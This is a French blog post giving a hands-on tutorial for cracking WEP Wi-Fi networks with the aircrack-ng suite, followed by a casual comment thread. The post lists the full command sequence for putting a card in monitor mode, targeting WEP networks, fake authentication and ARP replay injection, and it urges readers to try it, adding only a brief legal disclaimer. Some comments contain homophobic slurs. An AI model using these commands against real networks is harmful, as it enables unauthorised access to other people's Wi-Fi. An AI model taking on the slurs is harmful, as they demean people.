[TUTO] Cracker un réseau WEP

Même un chien de la casse est capable de faire ça, donc tu peux essayer de ton côté.

Le plus "dur" c'est sans doute de télécharger BT5 et de choisir entre l'installation d'une machine virtuelle ou de graver un live CD. La machine virtuelle vous évite de devoir redémarrer et de trimballer un CD tout le temps, mais prend de la place sur votre DD interne. Vous pouvez aussi vous faire une clé usb bootable, et je suis certain que Google serait ravi de vous montrer comment faire.

Si y'a un truc que tu piges pas du tout, fais tourner, mais Google répondra sans doute plus vite et mieux.

J'ai hâte de voir les tutos d'Oncela.

Sinon, pour reprendre la description : Hacker le réseau de votre voisin peut vous faire gagner un an de Prison et 15 000 € d'amende, sans oublier la confiscation du matériel, la mise sous surveillance pour 2 ans ainsi que l'impossibilité de souscrire à un abonnement internet pour les deux prochaines années. Cette vidéo est pédagogique et souligne l'inefficacité de la sécurité WEP.

Les lignes de code sont :

airmon-ng start mon0
airodump-ng --encrypt wep mon0
airodump-ng -w capture -c 9 (ou autre) --bssid 00:00:00:00:00:00 mon0
aireplay-ng -1 0 -e nomdureseau -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 mon0
aireplay-ng -3 -e nomdureseau -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 -x 600 -r capture-01.cap wlan0

-w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets. Exemple: airodump-ng -w out wlan0 (un fichier de capture nommé out sera créé, le premier fichier s'appellera out-01.cap, le 2ème out-02.cap etc...)

--encrypt permet de filtrer les réseaux en fonction du type d'encryption utilisé. Exemple: airodump-ng --encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)

-c permet de cibler l'écoute sur un canal wifi particulier. Exemple: airodump-ng -c 1 wlan0 (airodump-ng n'écoutera que le canal 1)

--bssid permet de ne cibler qu'un seul point d'accès en fonction de son adresse mac. Exemple: airodump-ng --bssid 00:16:41:C9:E0:3F wlan0 (airodump-ng ne surveillera que le point d'accès dont l'adresse mac est 00:16:41:C9:E0:3F)

source : http://www.crack-wifi.com/tutoriel-crack-wep-aircrack-ng-backtrack.php

Dans Créas perso. Là t'as le permalien. Et là tu peux voir les tags.

Un com pour [TUTO] Cracker un réseau WEP

  1. Flubber dit :

    Bon choix pour Crystal Castles.

    • Oncela5eva dit :

      sauf ke ct ma muzik pour tou mes tuto
      c’est le seul groupe ke je connais

      meric deeplake pd… il me reste koi maintenant ?

      entouka, ça ma motiver pour me remettre aux miens, donc merci 🙂

      • Deeplake dit :

        C’est vrai ? Putain, j’suis désolé… à la base, je voulais vraiment mettre ça :

        C’est pas original, mais j’adore.

        Impatient de voir tes tutos, surtout que ça m’intéresse, parce que j’y connais queud.

        • iieprout dit :

          PUTAIN CETTE MUSIQUE QU’ELLE SOIT MAUDITE.

        • Oncela5eva dit :

          ouai beh vazi jvé les faire, c’est bon !! jmi met pour la soirée
          rien ke pour toi, bébé

          kan meme un peu dessu de pa avoir vu ta recette de cuisine :'(
          mai bon, tu veu te la jouer adulte et tou, jcompren (tu viendra juste pa chialer kan on te passera la corde autour du cul)

  2. zogug dit :

    lol tarlouze sous mac
    j’avais déjà essayé un jour sinon mais genre ça foirait cash à la premiere commande uesh

    • Deeplake dit :

      MAC vs. PC : Débat d’occidentaux pourris gâtés jusqu’à la moelle, et désuet avec les machines virtuelles.

      Ah ouais, mais ouais, enfin j’ai oublié de préciser un truc important (merde…) il faut une clé usb wifi ou une carte compatible avec l’injection des données. Si t’as de la chance, t’as déjà une bonne carte WiFi, sinon t’en achète. Moi j’ai ça : http://www.ldlc.com/fiche/PB00103030.html ça coûte pas plus de 10 euros et ça marche très bien. Tu peux taper dans les produits genre antenne qui capte les réseau à 200m de distance, mais bon…

  3. Antipho dit :

    Deeplake tuto d’dbogoss

  4. Putricide d'amonium dit :

    C’est trop pas gentil de faire ça quoi.

  5. Bernard le Connard dit :

    Petit tuto sympa, bien que les clef WEP en sécurité Wifi sont désormais quelque peu désuètes.

  6. iieprout dit :

    bon je sais pas si on va avoir des soucis avec ça mais bon, c’était une vidéo fortement sympathique.
    j’ai la flemme de tenter par contre, mais bon au moins ça souligne que faut pas se fier à ce genre de « sécurité ».

  7. Drap-Housse dit :

    Bon, au début je me suis dit « oh, je ne suis plus privilégiée dans mon échange e-épistolaire avec herr Deepcake », puis j’ai vu le « coucou à DH » et j’ai été indulgente.

    <3

    • Oncela5eva dit :

      ah mais javé meme pa vu la dédicasse moi ^^ tro mimi tsé +1

      (on a regardé ça sur bidonville, et on été plus occuper à critiquer tes choix d’ordinateur ka vraiment regarder, dsl, ducoup j’ai reregardé)

      • Deeplake dit :

        Ah ouais ? Ptain, mais vous bloquez trop les mecs… En plus c’est pas mes choix mais ceux de mon patron geek pro-mac, pour toutes les raisons que je n’évoquerai pas ici m’étant juré de plus entretenir de débats informatiques stériles, comme pourquoi c’est mieux de rester avec PHP4 plutôt qur PHP5, la supériorité des newsgroups sur les torrents, la stabilité des systèmes sous unix, ou le tristement célèbre : Firefox vs. Chrome.

      • Deeplake dit :

        En plus je t’avais appelé petite fleur et tout… Voilà, je ferai plus jamais confiance aux hommes maintenant, j’ai trop souffert.

        • Oncela5eva dit :

          la dernière fois ke kelkun a di « je fré plus jamai confiance aux hommes » à cause de moi, je me retrouvai devan un jury populaire un an plus tard 🙁

          bon, pour m’exuser, jtenvoi un peti kdo en mail <3

  8. MEGALCO dit :

    Jt’avais trop flairé Deep, merci de me faire honneur.

  9. PUTAGAZ Greroux (edit) dit :

    par contre parler de gaz-o-b c’est clairement interdit sur ce putain de site ou la censure est monnaie courante.

    • Deeplake dit :

      Ok le mec lourd, donc on va expliquer dans les détails, parce que apparemment t’es vachement con : Gaz-o-B (merci pour l’effort cette fois-ci) c’était pas une blague, et ce serait cool que le site ait encore quelques mois à vivre. Peut-être qu’on risquait rien, peut-être qu’on risquait quelque chose : personne ne le sait. Ce qu’on sait par contre, c’est qu’on a pas envie d’avoir d’emmerdes, ni se prendre la tête avec des conneries para-judiciaires, d’autant qu’il s’agissait d’un seul tag à enlever, que c’était pas la mer à boire et surtout qu’on a pas 14 ans et qu’on va pas jouer les rageux genre : « ouais, méchante entreprise, on va se venger » parce qu’il y a pas à se venger, y’a pas à en rire non plus, y’a juste à fermer sa gueule et faire profil bas histoire d’éviter autant que possible les emmerdes IRL. Une personne morale telle que Gaz-o-B a le droit de faire valoir ses droits et quoiqu’on en pense, c’est légitime qu’elle se sente lésée. Ils ont étés tout à fait corrects avec nous, donc c’est pas dans notre intérêt d’être incorrects avec eux. Le service client de cette entreprise est pour le moins actif et à l’affût et même si c’est possible qu’on ne soient pas dans notre tort, on va pas jouer aux gringos des temps modernes genre « on nique la société » parce qu’en plus d’être potentiellement dangereux, c’est surtout pas drôle.

      Donc ton délire répétitif de vouloir poster la mascotte de cette entreprise sur mon article est lourd. Si ton commentaire est supprimé une fois, il sera supprimé les suivantes : moi ça me parait évident, mais si ça l’est pas pour toi, je prends quand même le temps de t’expliquer, je pense pas que t’aies besoin non plus d’un tutoriel vidéo. « la censure monnaie courante » LOL, je crois que tu connais ce site depuis suffisamment longtemps pour t’apercevoir qu’au milieu du porno, du gore, des vidéos de Magnotta et du kKk, le peu de choses supprimées sont soit des spams, soit les tentatives d’Oncela de faire du html en test : rien d’autre. Si ça te convient pas comme façon de faire, créée un site où tu pourras insulter librement plein d’organismes si ça peut te faire bander, et vois comment ça évolue. Quand c’est ton nom qu’il y a écrit dans un mail du service client, les choses deviennent différentes. C’est toi qui endosse les responsabilités, donc c’est à toi de savoir si ça vaut le coup ou non. Pour nous le choix est fait, et si la décision te convient pas, on s’en branle.

      Alors range 2 minutes ta putain de fierté d’internaute, genre « comment ose-t-on supprimer un de mes merveilleux posts ? » et fais preuve de maturité. Grandis un peu, et surtout : ARRETE DE NOUS PETER LES COUILLES.

      Cordialement.

  10. PUTAGAZ Greroux dit :

    je change de pseudo.

  11. PUTAGAZ Greroux dit :

    ça m’évitera la censure politique…

    Image d'utilisateur

  12. PUTAGAZ Greroux dit :

    t’as vu t’as gagné. t’as le sexe dur maintenant?

Laisser un commentaire

C'est bon, les autres verront pas ton mail. Et les * c'est que c'est obligenculé.

Va vite sur monpremiersiteinternet.com pour plus de lol.

(J'déconne ça sert à rien)